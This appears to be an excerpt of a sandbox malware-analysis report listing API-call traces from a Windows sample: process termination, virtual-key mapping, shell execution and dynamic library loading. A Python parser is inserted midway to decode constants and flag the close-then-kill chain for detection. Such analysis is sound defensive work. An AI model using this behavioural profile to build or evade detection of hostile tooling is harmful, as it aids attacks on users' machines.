                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00628A4E
                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00628A62
                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00628A70
                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00628A80
                                                  • EndPath.GDI32(?), ref: 00628A90
                                                  • StrokePath.GDI32(?), ref: 00628AA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
                                                  • Instruction ID: ba1638d92a61f278db07272e770d8e4b5c06b00d9dc9133c8dbf13784ad74fd3
                                                  • Opcode Fuzzy Hash: 4594498761b2de6d0860dd8b4050aae56c3f4d4442c2a76c178c4e44f8703f80
                                                  • Instruction Fuzzy Hash: F1110C7600051DFFEF129F94DC48E9A7F6EEB08364F048011FA159A1A1C7729D55DFA0
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 005F5218
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 005F5229
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005F5230
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 005F5238
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005F524F
                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 005F5261
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
                                                  • Instruction ID: fb59b37984326cc04ee461136850aa8c2b6f84a4dc7e381fce719b713863666e
                                                  • Opcode Fuzzy Hash: 029268a5651a19a34a60b6105ac66329714f70c3c221ba8e0bfc1b14056ad2ab
                                                  • Instruction Fuzzy Hash: 67018F75E00B08BBEB109BA69C49E5EBFB9FF48761F044165FB04A7281D6709801CBA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
                                                  • Instruction ID: 15126523f194e4ad346360752e03927d955e0d609b1171b3dbf4257a0ceefe5e
                                                  • Opcode Fuzzy Hash: 54bc562b02620e6042f95feab3ab5209894c256b521af19b7f4d4a8e2cf9f681
                                                  • Instruction Fuzzy Hash: 180167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005FEB30
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005FEB46
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 005FEB55
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB64
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB6E
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
                                                  • Instruction ID: fee45d6bde68b1e8536950a21601b57507979bed10880e101b47155f411d53a7
                                                  • Opcode Fuzzy Hash: 628290074e15895b4b632c84f476d5d454d9be77fbce034cd9b3090af99e21af
                                                  • Instruction Fuzzy Hash: 4FF05E72240D59BBE7315B629C0EEEF3E7EEFCAB21F005158F601D1091D7A45A02C6B5
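The two records above (the MapVirtualKeyW sequence at 00591BF4 and the PostMessageW / SendMessageTimeoutW / OpenProcess / TerminateProcess sequence at 005FEB30) read much more easily once the raw constants are named. The parser below is an added example; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses the report's "API.MODULE(args), ref: ADDR" entries, truncates each argument list to the API's declared parameter count (the report prints further stack slots past the last real parameter, so a one-parameter CloseHandle shows more than a dozen values), labels the constants a Win32 header would name, and flags the graceful-close-then-force-kill chain. The two listings embedded in it are copied verbatim from the records above; the parameter counts and constant names come from the Win32 API and are assumed to match what this binary passes. Note that 0x1F0FFF is the pre-Vista PROCESS_ALL_ACCESS value; SDKs targeting Vista or later define 0x1FFFFF, so a detection rule keyed on the newer value would miss this call.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Added example, not part of the Joe Sandbox report or of the analysed sample.
# Matches entries such as
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 005FEB64
#   • _free.LIBCMT ref: 005C2DAB
#   • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Declared parameter counts (32-bit stdcall, from the Win32 API). The report
# prints stack slots past the last real parameter, so anything beyond these
# counts is caller-frame residue, not an argument.
PARAM_COUNTS = {
    "PostMessageW": 4, "SendMessageTimeoutW": 7, "GetWindowThreadProcessId": 2,
    "OpenProcess": 3, "TerminateProcess": 2, "CloseHandle": 1, "MapVirtualKeyW": 2,
}

# Symbol tables, limited to the values that occur in the two records.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE"}
SMTO_FLAGS = {0x0002: "SMTO_ABORTIFHUNG"}
PROCESS_ACCESS = {0x001F0FFF: "PROCESS_ALL_ACCESS"}   # pre-Vista value; Vista+ SDKs use 0x1FFFFF
VIRTUAL_KEYS = {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
# (API, parameter index) -> table used to name that parameter.
PARAM_TABLES: Dict[Tuple[str, int], Dict[int, str]] = {
    ("PostMessageW", 1): WINDOW_MESSAGES, ("SendMessageTimeoutW", 1): WINDOW_MESSAGES,
    ("SendMessageTimeoutW", 4): SMTO_FLAGS, ("OpenProcess", 0): PROCESS_ACCESS,
    ("MapVirtualKeyW", 0): VIRTUAL_KEYS,
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?'
    ref: int                    # call-site address
    via_subcall: Optional[int]  # address of the subcall function, if listed

def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    if token in ("", "?"):
        return None
    value = int(token.lstrip("-"), 16)
    return -value if token.startswith("-") else value

def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API entry in a block of report text, in listed order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [_parse_arg(t) for t in raw.split(",")] if raw.strip() else []
        count = PARAM_COUNTS.get(m.group("api"))
        if count is not None:
            args = args[:count]   # drop the stack residue past the real parameters
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

def decode_call(call: ApiCall) -> str:
    """Render a call with named constants where a table exists, hex otherwise."""
    parts = []
    for i, value in enumerate(call.args):
        if value is None:
            parts.append("?")
            continue
        parts.append(PARAM_TABLES.get((call.api, i), {}).get(value, f"0x{value:X}"))
    return f"{call.api}({', '.join(parts)})"

def find_forced_close_chain(calls: List[ApiCall]) -> Optional[Tuple[int, int, int]]:
    """Refs of (WM_CLOSE message, OpenProcess(PROCESS_ALL_ACCESS), TerminateProcess)
    when they occur in that order; None otherwise."""
    close_ref = open_ref = None
    for c in calls:
        if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1 and c.args[1] == 0x10:
            close_ref = c.ref if close_ref is None else close_ref
        elif c.api == "OpenProcess" and c.args and c.args[0] == 0x1F0FFF and close_ref is not None:
            open_ref = c.ref
        elif c.api == "TerminateProcess" and open_ref is not None:
            return (close_ref, open_ref, c.ref)
    return None

# Constructed input: the two records from the report, copied verbatim.
KILL_CHAIN_LISTING = """
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005FEB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005FEB46
• GetWindowThreadProcessId.USER32(?,?), ref: 005FEB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005FEB75
"""
SEND_INIT_LISTING = """
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
"""

if __name__ == "__main__":
    for c in parse_api_lines(KILL_CHAIN_LISTING + SEND_INIT_LISTING):
        print(f"{c.ref:08X}  {decode_call(c)}")
    print("forced-close chain:", find_forced_close_chain(parse_api_lines(KILL_CHAIN_LISTING)))
```

Decoded, the second record is SendMessageTimeoutW(?, WM_CLOSE, 0, 0, SMTO_ABORTIFHUNG, 0x1F4, ?), i.e. a 500 ms polite close that falls through to OpenProcess(PROCESS_ALL_ACCESS) and TerminateProcess on the owning process; the first record maps VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU to scan codes (mapping type 0, MAPVK_VK_TO_VSC), the setup a keystroke-synthesis routine needs. Both are consistent with the AutoIt runtime that the Signatures section says this binary embeds, which is why the editor should treat these two records as runtime code rather than as the payload's own logic when writing detections.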
                                                  APIs
                                                  • GetClientRect.USER32(?), ref: 005E7452
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 005E7469
                                                  • GetWindowDC.USER32(?), ref: 005E7475
                                                  • GetPixel.GDI32(00000000,?,?), ref: 005E7484
                                                  • ReleaseDC.USER32(?,00000000), ref: 005E7496
                                                  • GetSysColor.USER32(00000005), ref: 005E74B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                  • String ID:
                                                  • API String ID: 272304278-0
                                                  • Opcode ID: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
                                                  • Instruction ID: e2e767d6021d7866dbccf60af4b0b2b4d063c518757134095a354ae6f5ce59c5
                                                  • Opcode Fuzzy Hash: 50469b109ffaa88e7f5e4e90edee8ea14e9f5b51d5e681e703ed4104c377fd85
                                                  • Instruction Fuzzy Hash: 95018631400A19EFEB215FA4DC08BAE7FB6FF08321F201460F916A21A0CB311E62AB50
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005F187F
                                                  • UnloadUserProfile.USERENV(?,?), ref: 005F188B
                                                  • CloseHandle.KERNEL32(?), ref: 005F1894
                                                  • CloseHandle.KERNEL32(?), ref: 005F189C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F18A5
                                                  • HeapFree.KERNEL32(00000000), ref: 005F18AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
                                                  • Instruction ID: 0431e543f85b82eda4bfad23fc82bcc1ac9a74d053534609f3441caf101792f1
                                                  • Opcode Fuzzy Hash: 9065f2aeb31803b729148465938fa81642bb180d5e16ef7dddff1b9b195b0b6e
                                                  • Instruction Fuzzy Hash: 6CE0C236004D02BBDB115BA1ED0D90ABB2AFF49B32B209620F22585074CB329432EB50
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0059BEB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: D%f$D%f$D%f$D%fD%f
                                                  • API String ID: 1385522511-2841713072
                                                  • Opcode ID: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
                                                  • Instruction ID: 6ba8c19ac665433aa35d6aeff3a06a35d80601bfe0c7372d0f75fdb0593f7147
                                                  • Opcode Fuzzy Hash: 9587ee904dae7ea3f7e10ab2bc759b617e8ac2a6dce1aa95bc4974f3ab5382f0
                                                  • Instruction Fuzzy Hash: D8915C75A0060ACFEF18CF58D1906AABBF2FF58310F24856AD946AB351D771ED81CB90
                                                  APIs
                                                    • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                                                    • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  • __Init_thread_footer.LIBCMT ref: 00617BFB
                                                    • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                                                    • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                  • String ID: +T^$5$G$Variable must be of type 'Object'.
                                                  • API String ID: 535116098-1904898098
                                                  • Opcode ID: 35eaa0833f7c81004821b1c940427f9cbe801a90f1f5722238d52a1040324f86
                                                  • Instruction ID: 3123abcdf55686ea18176f1698a21e8e53698455d087fd8dc15fe0eb6920036c
                                                  • Opcode Fuzzy Hash: 35eaa0833f7c81004821b1c940427f9cbe801a90f1f5722238d52a1040324f86
                                                  • Instruction Fuzzy Hash: 84916D74A04209EFCB14EF94D8959EDBBB2FF89304F188059F8069B391DB71AE85CB51
                                                  APIs
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC6EE
                                                  • _wcslen.LIBCMT ref: 005FC735
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005FC79C
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005FC7CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                  • String ID: 0
                                                  • API String ID: 1227352736-4108050209
                                                  • Opcode ID: 287f3ebdb74a203418bb60cb7b70eea27fc18337dafc33dae1f3639ad9381e19
                                                  • Instruction ID: b6050d70eaa508d202d19e4c53ee8c5bff826df00d63f016dd51e30679a052da
                                                  • Opcode Fuzzy Hash: 287f3ebdb74a203418bb60cb7b70eea27fc18337dafc33dae1f3639ad9381e19
                                                  • Instruction Fuzzy Hash: A451CF7160930D9BD714AF28CA49A7B7FE8FF85314F040A3DFA95D6190DB68D904CB92
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0061AEA3
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                  • GetProcessId.KERNEL32(00000000), ref: 0061AF38
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061AF67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                  • String ID: <$@
                                                  • API String ID: 146682121-1426351568
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7206
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005F723C
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005F724D
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005F72CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                  • API String ID: 176396367-4004644295
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00622F8D
                                                  • LoadLibraryW.KERNEL32(?), ref: 00622F94
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00622FA9
                                                  • DestroyWindow.USER32(?), ref: 00622FB1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                  • String ID: SysAnimate32
                                                  • API String ID: 3529120543-1011021900
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002), ref: 005B4D8D
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B4DA0
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,005B4D1E,005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000), ref: 005B4DC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 005ED3AD
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005ED3BF
                                                  • FreeLibrary.KERNEL32(00000000), ref: 005ED3E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
